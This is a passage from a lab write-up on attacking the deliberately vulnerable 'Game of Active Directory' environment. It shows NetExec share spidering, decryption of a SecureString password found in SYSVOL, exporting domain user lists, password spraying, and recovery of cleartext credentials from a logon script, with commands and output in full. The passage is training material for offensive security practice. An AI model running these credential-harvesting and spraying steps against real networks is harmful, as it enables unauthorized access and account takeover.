SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*]     STATS_FLAG: True
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*]  OUTPUT_FOLDER: /home/kali/.nxc/modules/nxc_spider_plus
SMB         192.168.75.11   445    WINTERFELL       [*] Enumerated shares
SMB         192.168.75.11   445    WINTERFELL       Share           Permissions     Remark
SMB         192.168.75.11   445    WINTERFELL       -----           -----------     ------
SMB         192.168.75.11   445    WINTERFELL       ADMIN$                          Remote Admin
SMB         192.168.75.11   445    WINTERFELL       C$                              Default share
SMB         192.168.75.11   445    WINTERFELL       IPC$            READ            Remote IPC
SMB         192.168.75.11   445    WINTERFELL       NETLOGON        READ            Logon server share 
SMB         192.168.75.11   445    WINTERFELL       SYSVOL          READ            Logon server share 
SMB         192.168.75.23   445    BRAAVOS          [*] Enumerated shares
SMB         192.168.75.23   445    BRAAVOS          Share           Permissions     Remark
SMB         192.168.75.23   445    BRAAVOS          -----           -----------     ------
SMB         192.168.75.23   445    BRAAVOS          ADMIN$                          Remote Admin
SMB         192.168.75.23   445    BRAAVOS          all             READ,WRITE      Basic RW share for all
SMB         192.168.75.23   445    BRAAVOS          C$                              Default share
SMB         192.168.75.23   445    BRAAVOS          CertEnroll      READ            Active Directory Certificate Services share
SMB         192.168.75.23   445    BRAAVOS          IPC$            READ            Remote IPC
SMB         192.168.75.23   445    BRAAVOS          public          READ,WRITE      Basic Read share for all domain users
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/192.168.75.23.json".
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] SMB Shares:           6 (ADMIN$, all, C$, CertEnroll, IPC$, public)
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] SMB Readable Shares:  4 (all, CertEnroll, IPC$, public)
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] SMB Writable Shares:  2 (all, public)
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] SMB Filtered Shares:  1
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] Total folders found:  0
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] Total files found:    4
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] File size average:    700.75 B
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] File size min:        320 B
SPIDER_PLUS 192.168.75.23   445    BRAAVOS          [*] File size max:        902 B
SMB         192.168.75.10   445    KINGSLANDING     [*] Enumerated shares
SMB         192.168.75.10   445    KINGSLANDING     Share           Permissions     Remark
SMB         192.168.75.10   445    KINGSLANDING     -----           -----------     ------
SMB         192.168.75.10   445    KINGSLANDING     ADMIN$                          Remote Admin
SMB         192.168.75.10   445    KINGSLANDING     C$                              Default share
SMB         192.168.75.10   445    KINGSLANDING     CertEnroll      READ            Active Directory Certificate Services share
SMB         192.168.75.10   445    KINGSLANDING     IPC$            READ            Remote IPC
SMB         192.168.75.10   445    KINGSLANDING     NETLOGON        READ            Logon server share 
SMB         192.168.75.10   445    KINGSLANDING     SYSVOL          READ            Logon server share 
SMB         192.168.75.22   445    CASTELBLACK      [*] Enumerated shares
SMB         192.168.75.22   445    CASTELBLACK      Share           Permissions     Remark
SMB         192.168.75.22   445    CASTELBLACK      -----           -----------     ------
SMB         192.168.75.22   445    CASTELBLACK      ADMIN$                          Remote Admin
SMB         192.168.75.22   445    CASTELBLACK      all             READ,WRITE      Basic RW share for all
SMB         192.168.75.22   445    CASTELBLACK      C$                              Default share
SMB         192.168.75.22   445    CASTELBLACK      IPC$            READ            Remote IPC
SMB         192.168.75.22   445    CASTELBLACK      public          READ,WRITE      Basic Read share for all domain users
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/192.168.75.22.json".
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] SMB Shares:           5 (ADMIN$, all, C$, IPC$, public)
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] SMB Readable Shares:  3 (all, IPC$, public)
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] SMB Writable Shares:  2 (all, public)
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] SMB Filtered Shares:  1
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] Total folders found:  0
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] Total files found:    1
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] File size average:    413 B
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] File size min:        413 B
SPIDER_PLUS 192.168.75.22   445    CASTELBLACK      [*] File size max:        413 B
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/192.168.75.12.json".
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] SMB Shares:           5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] SMB Readable Shares:  3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] SMB Filtered Shares:  1
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] Total folders found:  26
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] Total files found:    9
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] File size average:    1.09 KB
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] File size min:        23 B
SPIDER_PLUS 192.168.75.12   445    MEEREEN          [*] File size max:        4.08 KB
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/192.168.75.11.json".
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] SMB Shares:           5 (ADMIN$, C$, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] SMB Readable Shares:  3 (IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] SMB Filtered Shares:  1
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] Total folders found:  28
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] Total files found:    13
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] File size average:    864.46 B
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] File size min:        23 B
SPIDER_PLUS 192.168.75.11   445    WINTERFELL       [*] File size max:        4.11 KB
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [+] Saved share-file metadata to "/home/kali/.nxc/modules/nxc_spider_plus/192.168.75.10.json".
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] SMB Shares:           6 (ADMIN$, C$, CertEnroll, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] SMB Readable Shares:  4 (CertEnroll, IPC$, NETLOGON, SYSVOL)
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] SMB Filtered Shares:  1
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] Total folders found:  28
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] Total files found:    9
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] File size average:    1.34 KB
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] File size min:        23 B
SPIDER_PLUS 192.168.75.10   445    KINGSLANDING     [*] File size max:        5.24 KB
Running nxc against 39 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00

Interesting finds at DC WINTERFELL.NORTH.SEVENKINGDOMS.LOCAL

Let’s download everything…

Bash
nxc smb 192.168.75.2-40 -u 'samwell.tarly' -p 'Heartsbane' -d north.sevenkingdoms.local -M spider_plus -o DOWNLOAD_FLAG=True
Netexec SMB - spidering shares and downloading files
Spidering shares and downloading all files

And now we print everyfile to stdout to take a quick look

Bash
┌──(kali㉿kali)-[~/.nxc/modules/nxc_spider_plus/192.168.75.11]
└─$ find . -type f -print0 | while IFS= read -r -d $'\0' file; do
echo "--- File: $file ---"
cat "$file"
echo ""
done

secret.ps1 — PowerShell SecureString + key

--- File: ./SYSVOL/north.sevenkingdoms.local/scripts/secret.ps1 ---                                                                                                                                                                                                          
# cypher script                                                                                                                                                                                                                                                              
# $domain="sevenkingdoms.local"                                                                                                                                                                                                                                              
# $EncryptionKeyBytes = New-Object Byte[] 32                                                                                                                                                                                                                                 
# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)                                                                                                                                                                                   
# $EncryptionKeyBytes | Out-File "encryption.key"                                                                                                                                                                                                                            
# $EncryptionKeyData = Get-Content "encryption.key"                                                                                                                                                                                                                          
# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"                                                                                                                                                       
                                                                                                                                                                                                                                                                             
# secret stored :                                                                                                                                                                                                                                                            
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="

# T.L.

Decrypt the secret using the encryption key provided in the same file…

Bash
PS C:\Users\> # The 32-byte (256-bit) AES encryption key provided in the script
PS C:\Users\> $keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
PS C:\Users\>
PS C:\Users\> # The encrypted secret string
PS C:\Users\> $encryptedSecret = "76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
PS C:\Users\>
PS C:\Users\> # Decrypt the string into a SecureString object using the key
PS C:\Users\> $secureString = ConvertTo-SecureString -String $encryptedSecret -Key $keyData
PS C:\Users\>
PS C:\Users\> # Convert the SecureString object back to plaintext to read it
PS C:\Users\> # This requires using the .NET Marshal class to extract the string from protected memory
PS C:\Users\> $bstr = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($secureString)
PS C:\Users\> $plaintext = [System.Runtime.InteropServices.Marshal]::PtrToStringBSTR($bstr)
PS C:\Users\> [System.Runtime.InteropServices.Marshal]::ZeroFreeBSTR($bstr)
PS C:\Users\>
PS C:\Users\> # Display the decrypted secret
PS C:\Users\> Write-Output "The decrypted secret is:"
The decrypted secret is:
PS C:\Users\> Write-Output $plaintext
powerkingftw135

And now we have what seems to be a password but we don’t know for which username, let’s try a simple password spray, but for that we will need a userlist for each domain.

Exporting users on all 3 domains and password spraying.

Let’s export userlists on all 3 domains and password spray to find password is for which user, password policy shouldn’t be an issue for us, since we will spray with one password only, for exporting users we will use netexec’s helpful –users-export option but we have to use it separately for each DC.

[20:42:51]┌──(kali㉿kali)-[~/GameOfActiveDirectory]                                                                                                                                                                                                                                                                       
└─$ nxc ldap 192.168.75.11 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_north.sevenkingdoms.local.txt                                                                                                                                                                         
LDAP        192.168.75.11   389    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:None) (channel binding:Never)                                                                                                                                  
LDAP        192.168.75.11   389    WINTERFELL       [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane                                                                                                                                                                                                                
LDAP        192.168.75.11   389    WINTERFELL       [*] Enumerated 16 domain users: north.sevenkingdoms.local                                                                                                                                                                                                             
LDAP        192.168.75.11   389    WINTERFELL       -Username-                    -Last PW Set-       -BadPW-  -Description-                                                                                                                                                                                              
LDAP        192.168.75.11   389    WINTERFELL       Administrator                 2025-10-05 00:28:05 0        Built-in account for administering the computer/domain                                                                                                                                                     
LDAP        192.168.75.11   389    WINTERFELL       Guest                         <never>             3        Built-in account for guest access to the computer/domain                                                                                                                                                   
LDAP        192.168.75.11   389    WINTERFELL       vagrant                       2021-05-12 13:39:16 0        Vagrant User                                                                                                                                                                                               
LDAP        192.168.75.11   389    WINTERFELL       krbtgt                        2025-10-05 00:53:35 3        Key Distribution Center Service Account                                                                                                                                                                    
LDAP        192.168.75.11   389    WINTERFELL       arya.stark                    2025-10-05 01:11:30 1        Arya Stark                                                                                                                                                                                                 
LDAP        192.168.75.11   389    WINTERFELL       eddard.stark                  2025-10-05 01:11:33 0        Eddard Stark                                                                                                                                                                                               
LDAP        192.168.75.11   389    WINTERFELL       catelyn.stark                 2025-10-05 01:11:35 1        Catelyn Stark                                                                                                                                                                                              
LDAP        192.168.75.11   389    WINTERFELL       robb.stark                    2025-10-05 01:11:37 0        Robb Stark                                                                                                                                                                                                 
LDAP        192.168.75.11   389    WINTERFELL       sansa.stark                   2025-10-05 01:11:39 1        Sansa Stark                                                                                                                                                                                                
LDAP        192.168.75.11   389    WINTERFELL       brandon.stark                 2025-10-05 01:11:41 0        Brandon Stark                                                                                                                                                                                              
LDAP        192.168.75.11   389    WINTERFELL       rickon.stark                  2025-10-05 01:11:44 1        Rickon Stark                                                                                                                                                                                               
LDAP        192.168.75.11   389    WINTERFELL       hodor                         2025-10-05 01:11:46 0        Brainless Giant                                                                                                                                               
LDAP        192.168.75.11   389    WINTERFELL       jon.snow                      2025-10-05 01:11:48 1        Jon Snow                                                                                                                                                      
LDAP        192.168.75.11   389    WINTERFELL       samwell.tarly                 2025-10-05 01:11:50 0        Samwell Tarly (Password : Heartsbane)                                                                                                                         
LDAP        192.168.75.11   389    WINTERFELL       jeor.mormont                  2025-10-05 01:11:53 1        Jeor Mormont                                                                                                                                                  
LDAP        192.168.75.11   389    WINTERFELL       sql_svc                       2025-10-05 01:11:55 0        sql service                                                                                                                                                   
LDAP        192.168.75.11   389    WINTERFELL       [*] Writing 16 local users to nxc_users_north.sevenkingdoms.local.txt                                                                                                                                                    
                                                                                                                                                                                                                                                                             
Bash
[20:43:37]┌──(kali㉿kali)-[~/GameOfActiveDirectory]                                                                                                                                                                                                                          
└─$ nxc ldap 192.168.75.10 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_sevenkingdoms.local.txt                                                                                                                                  
LDAP        192.168.75.10   389    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:north.sevenkingdoms.local) (signing:None) (channel binding:Never)                                                                                   
LDAP        192.168.75.10   389    KINGSLANDING     [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane                                                                                                                                                                   
LDAP        192.168.75.10   389    KINGSLANDING     [*] Enumerated 15 domain users: north.sevenkingdoms.local                                                                                                                                                                
LDAP        192.168.75.10   389    KINGSLANDING     -Username-                    -Last PW Set-       -BadPW-  -Description-                                                                                                                                                 
LDAP        192.168.75.10   389    KINGSLANDING     Administrator                 2025-10-05 00:28:05 0        Built-in account for administering the computer/domain                                                                                                        
LDAP        192.168.75.10   389    KINGSLANDING     Guest                         <never>             1        Built-in account for guest access to the computer/domain                                                                                                      
LDAP        192.168.75.10   389    KINGSLANDING     vagrant                       2021-05-12 13:39:16 0        Vagrant User                                                                                                                                                  
LDAP        192.168.75.10   389    KINGSLANDING     krbtgt                        2025-10-05 00:35:50 1        Key Distribution Center Service Account                                                                                                                       
LDAP        192.168.75.10   389    KINGSLANDING     tywin.lannister               2025-10-05 01:11:30 0        Tywin Lanister                                                                                                                                                
LDAP        192.168.75.10   389    KINGSLANDING     jaime.lannister               2025-10-05 01:11:32 0        Jaime Lanister                                                                                                                                                
LDAP        192.168.75.10   389    KINGSLANDING     cersei.lannister              2025-10-05 01:11:34 0        Cersei Lanister                                                                                                                                               
LDAP        192.168.75.10   389    KINGSLANDING     tyron.lannister               2025-10-05 01:11:37 0        Tyron Lanister                                              
LDAP        192.168.75.10   389    KINGSLANDING     robert.baratheon              2025-10-05 01:11:39 0        Robert Lanister                                             
LDAP        192.168.75.10   389    KINGSLANDING     joffrey.baratheon             2025-10-05 01:11:41 0        Joffrey Baratheon                                           
LDAP        192.168.75.10   389    KINGSLANDING     renly.baratheon               2025-10-05 01:11:44 0        Renly Baratheon                                             
LDAP        192.168.75.10   389    KINGSLANDING     stannis.baratheon             2025-10-05 01:11:46 0        Stannis Baratheon                                           
LDAP        192.168.75.10   389    KINGSLANDING     petyer.baelish                2025-10-05 01:11:48 0        Petyer Baelish                                              
LDAP        192.168.75.10   389    KINGSLANDING     lord.varys                    2025-10-05 01:11:50 0        Lord Varys                                                  
LDAP        192.168.75.10   389    KINGSLANDING     maester.pycelle               2025-10-05 01:11:53 0        Maester Pycelle                                             
LDAP        192.168.75.10   389    KINGSLANDING     [*] Writing 15 local users to nxc_users_sevenkingdoms.local.txt                                                                                                                                                          
Bash
[20:44:34]┌──(kali㉿kali)-[~/GameOfActiveDirectory]                                                                                                                                                                                                                          
└─$ nxc ldap 192.168.75.12 -d north.sevenkingdoms.local -u 'samwell.tarly' -p 'Heartsbane' --users-export nxc_users_essos.local.txt                                        
LDAP        192.168.75.12   389    MEEREEN          [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:north.sevenkingdoms.local) (signing:None) (channel binding:Never) 
LDAP        192.168.75.12   389    MEEREEN          [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane                                                                                                                                                                   
LDAP        192.168.75.12   389    MEEREEN          [*] Enumerated 12 domain users: north.sevenkingdoms.local                                                                                                                                                                
LDAP        192.168.75.12   389    MEEREEN          -Username-                    -Last PW Set-       -BadPW-  -Description-                                                                                                                                                                                              
LDAP        192.168.75.12   389    MEEREEN          Administrator                 2025-10-05 00:27:57 0        Built-in account for administering the computer/domain                                                                                                                                                     
LDAP        192.168.75.12   389    MEEREEN          Guest                         <never>             2        Built-in account for guest access to the computer/domain                                                                                                                                                   
LDAP        192.168.75.12   389    MEEREEN          DefaultAccount                <never>             0        A user account managed by the system.                       
LDAP        192.168.75.12   389    MEEREEN          vagrant                       2017-12-15 18:46:00 2        Vagrant User                                                           
LDAP        192.168.75.12   389    MEEREEN          krbtgt                        2025-10-05 00:35:49 2        Key Distribution Center Service Account                                                                                                                                                                    
LDAP        192.168.75.12   389    MEEREEN          daenerys.targaryen            2025-10-05 01:11:29 0        Darnerys Targaryen                                                                                                                                                                                         
LDAP        192.168.75.12   389    MEEREEN          viserys.targaryen             2025-10-05 01:11:31 0        Viserys Targaryen                                           
LDAP        192.168.75.12   389    MEEREEN          khal.drogo                    2025-10-05 01:11:32 0        Khal Drogo                                                  
LDAP        192.168.75.12   389    MEEREEN          jorah.mormont                 2025-10-05 01:11:33 0        Jorah Mormont                                               
LDAP        192.168.75.12   389    MEEREEN          missandei                     2025-10-05 01:11:34 0        missandei                                                   
LDAP        192.168.75.12   389    MEEREEN          drogon                        2025-10-05 01:11:35 0        drogon                                                      
LDAP        192.168.75.12   389    MEEREEN          sql_svc                       2025-10-05 01:11:36 0        sql service                                                 
LDAP        192.168.75.12   389    MEEREEN          [*] Writing 12 local users to nxc_users_essos.local.txt                  

And let’s password spray against each domain with the respective userlist.

Bash
[20:53:05]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ nxc smb 192.168.75.10 -u nxc_users_sevenkingdoms.local.txt -p powerkingftw135 --continue-on-success
SMB         192.168.75.10   445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\Administrator:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\Guest:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\vagrant:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\krbtgt:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [+] sevenkingdoms.local\tywin.lannister:powerkingftw135 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\jaime.lannister:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\cersei.lannister:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\tyron.lannister:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\robert.baratheon:powerkingftw135 STATUS_ACCOUNT_RESTRICTION 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\joffrey.baratheon:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\renly.baratheon:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\stannis.baratheon:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\petyer.baelish:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\lord.varys:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.10   445    KINGSLANDING     [-] sevenkingdoms.local\maester.pycelle:powerkingftw135 STATUS_LOGON_FAILURE 
                                                                                                                                                                                                                                                                                                                          
[20:53:25]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ nxc smb 192.168.75.11 -u nxc_users_north.sevenkingdoms.local.txt -p powerkingftw135 --continue-on-success
SMB         192.168.75.11   445    WINTERFELL       [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\Administrator:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\Guest:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\vagrant:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\krbtgt:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\arya.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\eddard.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\catelyn.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\robb.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sansa.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\brandon.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\rickon.stark:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\hodor:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jon.snow:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\samwell.tarly:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\jeor.mormont:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.11   445    WINTERFELL       [-] north.sevenkingdoms.local\sql_svc:powerkingftw135 STATUS_LOGON_FAILURE 
                                                                                                                                                                                                                                                                                                                          
[20:53:45]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ nxc smb 192.168.75.12 -u nxc_users_essos.local.txt -p powerkingftw135 --continue-on-success
SMB         192.168.75.12   445    MEEREEN          [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) (Null Auth:True)
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\Administrator:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\Guest:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\DefaultAccount:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\vagrant:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\krbtgt:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\daenerys.targaryen:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\viserys.targaryen:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\khal.drogo:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\jorah.mormont:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\missandei:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\drogon:powerkingftw135 STATUS_LOGON_FAILURE 
SMB         192.168.75.12   445    MEEREEN          [-] essos.local\sql_svc:powerkingftw135 STATUS_LOGON_FAILURE

And we have a valid password for sevenkingdoms.local\tywin.lannister.

For sevenkingdoms.local\robert.baratheon, seems password is valid but we get STATUS_ACCOUNT_RESTRICTION, the reason for this is that, although the password is valid, we cannot use NTLM authentication because robert.baratheon is in the Protected Users security group.

Bloodhound output shows ROBERT.BARATHEON is a member of protected users group
Bloodhound output shows ROBERT.BARATHEON is a member of protected users group

And we can also confirm it in the logs, event 4822.

Fortunately, the workaround is very simple, use Kerberos authentication, for that we need to use the FQDN or DNS hostnames of the domain instead of IP, this are two ways to do this:

  • Add the hostnames to /etc/hosts file.
  • Add the DC IP to the DNS servers used by attack box by editing /etc/resolv.conf – then no need to modify the /etc/hosts file.

I personally prefer the latter method, no need to modify the hosts file and by adding one DC IP to be used as our DNS resolver, we will be able to resolve all hostnames for all machines in the 3 domains.
If editing the hosts file, the entries will look like this

192.168.75.10 sevenkingdoms.local kingslanding.sevenkingdoms.local kinglanding
192.168.75.11  north.sevenkingdoms.local WINTERFELL.north.sevenkingdoms.local WINTERFELL
192.168.75.12 essos.local MEEREEN.essos.local MEEREEN

If editing /etc/resolv.conf – it’s also simple

Adding the Domain Controller of SEVENKINGDOMS.LOCAL to resolv.conf
Adding the Domain Controller of SEVENKINGDOMS.LOCAL to resolv.conf

Now, we can use Kerberos authentication to authenticate with sevenkingdoms.local\robert.baratheon credentials but unfortunately, authentication still fails with the password.

[7:45:53]┌──(kali㉿kali)-[~/GameOfActiveDirectory]
└─$ netexec smb sevenkingdoms.local -u robert.baratheon -p powerkingftw135 -k
SMB         sevenkingdoms.local 445    KINGSLANDING     [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         sevenkingdoms.local 445    KINGSLANDING     [-] sevenkingdoms.local\robert.baratheon:powerkingftw135 KDC_ERR_PREAUTH_FAILED

script.ps1 – Another share finding – Cleartext credentials for north.sevenkingdoms.local\jeor.mormont

1 --- File: ./SYSVOL/north.sevenkingdoms.local/scripts/script.ps1 ---

2 # fake script in netlogon with creds
3 $task = '/c TODO'
4 $taskName = "fake task"
5 $user = "NORTH\jeor.mormont"
6 $password = "_L0ngCl@w_"
7 # passwords in sysvol still …

Let’s validate credentials…

1 ┌──(kali㉿kali)-[~/GameOfActiveDirectory]
2 └─$ netexec smb 192.168.75.11 -u jeor.mormont -p 'L0ngCl@w'
